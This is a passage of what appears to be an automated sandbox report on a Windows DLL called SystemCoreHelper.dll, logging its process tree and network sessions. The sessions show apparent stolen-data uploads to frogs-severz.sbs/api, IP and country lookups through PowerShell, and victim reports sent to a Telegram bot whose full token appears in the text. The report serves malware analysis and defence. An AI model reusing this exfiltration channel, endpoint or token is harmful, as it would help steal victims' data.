cfL4;desc="?proto=TCP&rtt=1742&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19125&delivery_rate=1682997&cwnd=205&unsent_bytes=0&cid=cbce66c11ea96df3&ts=860&x=0"
2024-11-23 11:47:33 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 11:47:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	104.21.88.250	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:34 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E4SXMRUR15VL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8755 Host: frogs-severz.sbs
2024-11-23 11:47:34 UTC	8755	OUT	Data Raw: 2d 2d 45 34 53 58 4d 52 55 52 31 35 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 45 34 53 58 4d 52 55 52 31 35 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 34 53 58 4d 52 55 52 31 35 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 45 34 53 58 4d 52 55 Data Ascii: --E4SXMRUR15VLContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--E4SXMRUR15VLContent-Disposition: form-data; name="pid"2--E4SXMRUR15VLContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--E4SXMRU
2024-11-23 11:47:35 UTC	1010	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5u1incmid8povq6jjivmdlahnc; expires=Wed, 19-Mar-2025 05:34:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ML7urnt8SKQuJFW3EQPGnJG3eDuRT5MmPlzKnNZ88ezcN%2B0AB9uht14Vce3E%2FYb1VavN2ZIuRj37OIASOkXnZCvPC87J93LKQyJZVpYr%2FDTohp9D20FtidYyAvDVjGl9gqWu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70ecdd68b29e08-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1945&sent=10&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9688&delivery_rate=1458541&cwnd=163&unsent_bytes=0&cid=dca50ca56ec63ad0&ts=774&x=0"
2024-11-23 11:47:35 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 11:47:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49751	104.21.88.250	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:36 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=F0AWCPRRPW8BEIF User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20426 Host: frogs-severz.sbs
2024-11-23 11:47:36 UTC	15331	OUT	Data Raw: 2d 2d 46 30 41 57 43 50 52 52 50 57 38 42 45 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 46 30 41 57 43 50 52 52 50 57 38 42 45 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 30 41 57 43 50 52 52 50 57 38 42 45 49 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a Data Ascii: --F0AWCPRRPW8BEIFContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--F0AWCPRRPW8BEIFContent-Disposition: form-data; name="pid"3--F0AWCPRRPW8BEIFContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2
2024-11-23 11:47:36 UTC	5095	OUT	Data Raw: 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 Data Ascii: M?lrQMn 64F6(X&7~`aO
2024-11-23 11:47:37 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h5qj7hkif7vr780uaggkgbgctf; expires=Wed, 19-Mar-2025 05:34:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tknzShuVyMA%2FrMzaW95UjEYkpPvqfIZ0a0Xp%2Bav3BCqRIKC1h4VpCvNhuz8wX5BoqNwZFYxXMClI587st4MB%2F2KKb6NThHXbirFa1lPfzyv7ocpYrmp0YBSeLvd5uCE2fiIB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70eceb8b3b4307-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1676&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21385&delivery_rate=1685912&cwnd=237&unsent_bytes=0&cid=46de5f5cadda6a1a&ts=896&x=0"
2024-11-23 11:47:37 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 11:47:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	104.21.88.250	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:39 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=86OMU50YVU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1270 Host: frogs-severz.sbs
2024-11-23 11:47:39 UTC	1270	OUT	Data Raw: 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 31 65 65 32 0d 0a 2d 2d 38 36 4f 4d 55 35 30 59 56 55 0d 0a 43 Data Ascii: --86OMU50YVUContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--86OMU50YVUContent-Disposition: form-data; name="pid"1--86OMU50YVUContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e1ee2--86OMU50YVUC
2024-11-23 11:47:40 UTC	1014	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vd7grrigpj88eb814to1pp7e4c; expires=Wed, 19-Mar-2025 05:34:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mLbNHQitaOEQIDYPL%2BRdreWAgYxQO%2BzosSCQ4455xBfcsLlB2m%2FAADno2YZ94ls0tlSW%2B%2Fb2KO3suH3DPo22jQsUhyE7Uj0j%2BZlO5dN8LVQDoi96UNe2pDqDMCJIqDC3AXL3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70ecfd1c1a4340-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2557&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2179&delivery_rate=1150059&cwnd=199&unsent_bytes=0&cid=c78e44a8fb2e2735&ts=726&x=0"
2024-11-23 11:47:40 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 11:47:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	104.21.88.250	443	8084	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:41 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PB87JFRCI72DMDXKZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1139 Host: frogs-severz.sbs
2024-11-23 11:47:41 UTC	1139	OUT	Data Raw: 2d 2d 50 42 38 37 4a 46 52 43 49 37 32 44 4d 44 58 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 34 41 38 30 38 39 45 36 45 45 39 34 31 46 46 31 43 36 33 33 33 33 32 31 46 43 44 44 39 0d 0a 2d 2d 50 42 38 37 4a 46 52 43 49 37 32 44 4d 44 58 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 42 38 37 4a 46 52 43 49 37 32 44 4d 44 58 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 62 38 62 62 38 36 30 65 Data Ascii: --PB87JFRCI72DMDXKZContent-Disposition: form-data; name="hwid"35C4A8089E6EE941FF1C6333321FCDD9--PB87JFRCI72DMDXKZContent-Disposition: form-data; name="pid"1--PB87JFRCI72DMDXKZContent-Disposition: form-data; name="lid"HpOoIh--b8bb860e
2024-11-23 11:47:43 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 11:47:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jtoktuq96lc6qnbhfgq9vnh9ur; expires=Wed, 19-Mar-2025 05:34:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2udjTl35BZPHpE%2F9MXwjbGHzH23qv1lx3X93x5F9koLXBiNXbJL%2FRwKztd%2BRfLuJctMaPESHB7Lu%2FvnokSYn32li3XBTHZl%2FeGHyPQgepPqbztrm6wniZ%2Ft6SPjZDl6t0Aef"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e70ed0c8a3343e8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2563&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2055&delivery_rate=1004126&cwnd=214&unsent_bytes=0&cid=edfbdb8d19e16ddb&ts=1138&x=0"
2024-11-23 11:47:43 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 11:47:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49762	34.117.59.81	443	5436	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:55 UTC	156	OUT	GET /ip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ipinfo.io Connection: Keep-Alive
2024-11-23 11:47:55 UTC	305	IN	HTTP/1.1 200 OK date: Sat, 23 Nov 2024 11:47:55 GMT content-type: text/plain; charset=utf-8 Content-Length: 11 access-control-allow-origin: * via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-23 11:47:55 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49764	34.117.59.81	443	7680	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:47:57 UTC	156	OUT	GET /ip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ipinfo.io Connection: Keep-Alive
2024-11-23 11:47:58 UTC	305	IN	HTTP/1.1 200 OK date: Sat, 23 Nov 2024 11:47:57 GMT content-type: text/plain; charset=utf-8 Content-Length: 11 access-control-allow-origin: * via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-23 11:47:58 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35 Data Ascii: 8.46.123.75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49780	34.117.59.81	443	1880	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:48:04 UTC	161	OUT	GET /country HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ipinfo.io Connection: Keep-Alive
2024-11-23 11:48:05 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Sat, 23 Nov 2024 11:48:05 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-23 11:48:05 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49782	34.117.59.81	443	7588	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:48:06 UTC	161	OUT	GET /country HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ipinfo.io Connection: Keep-Alive
2024-11-23 11:48:07 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Sat, 23 Nov 2024 11:48:06 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-23 11:48:07 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49808	149.154.167.220	443	7748	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:48:18 UTC	337	OUT	GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: api.telegram.org Connection: Keep-Alive
2024-11-23 11:48:18 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 23 Nov 2024 11:48:18 GMT Content-Type: application/json Content-Length: 336 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-23 11:48:18 UTC	336	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 38 35 36 36 33 32 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 33 36 31 35 39 37 36 39 34 2c 22 74 69 74 6c 65 22 3a 22 61 73 64 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 33 36 32 34 39 38 2c 22 74 65 78 74 22 3a 22 4e 45 57 20 4c 4f 47 53 21 5c 6e 42 75 69 6c 64 20 3d 3e 20 62 62 73 5c 6e 49 50 20 3d 3e 20 Data Ascii: {"ok":true,"result":{"message_id":386,"from":{"id":8085663235,"is_bot":true,"first_name":"LoaderStyk_bot","username":"LoaderStyk_bot"},"chat":{"id":-1002361597694,"title":"asd","type":"supergroup"},"date":1732362498,"text":"NEW LOGS!\nBuild => bbs\nIP =>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49814	149.154.167.220	443	2256	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 11:48:19 UTC	337	OUT	GET /bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: api.telegram.org Connection: Keep-Alive
2024-11-23 11:48:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 23 Nov 2024 11:48:20 GMT Content-Type: application/json Content-Length: 336 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-23 11:48:20 UTC	336	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 30 38 35 36 36 33 32 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 6f 61 64 65 72 53 74 79 6b 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 33 36 31 35 39 37 36 39 34 2c 22 74 69 74 6c 65 22 3a 22 61 73 64 22 2c 22 74 79 70 65 22 3a 22 73 75 70 65 72 67 72 6f 75 70 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 32 33 36 32 35 30 30 2c 22 74 65 78 74 22 3a 22 4e 45 57 20 4c 4f 47 53 21 5c 6e 42 75 69 6c 64 20 3d 3e 20 62 62 73 5c 6e 49 50 20 3d 3e 20 Data Ascii: {"ok":true,"result":{"message_id":387,"from":{"id":8085663235,"is_bot":true,"first_name":"LoaderStyk_bot","username":"LoaderStyk_bot"},"chat":{"id":-1002361597694,"title":"asd","type":"supergroup"},"date":1732362500,"text":"NEW LOGS!\nBuild => bbs\nIP =>

Target ID:	0
Start time:	06:47:00
Start date:	23/11/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll"
Imagebase:	0x920000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:47:00
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:47:00
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:47:00
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled
Imagebase:	0x930000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:47:00
Start date:	23/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1
Imagebase:	0x930000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:47:00
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
Imagebase:	0x750000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:47:00
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:47:01
Start date:	23/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP"
Imagebase:	0x550000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
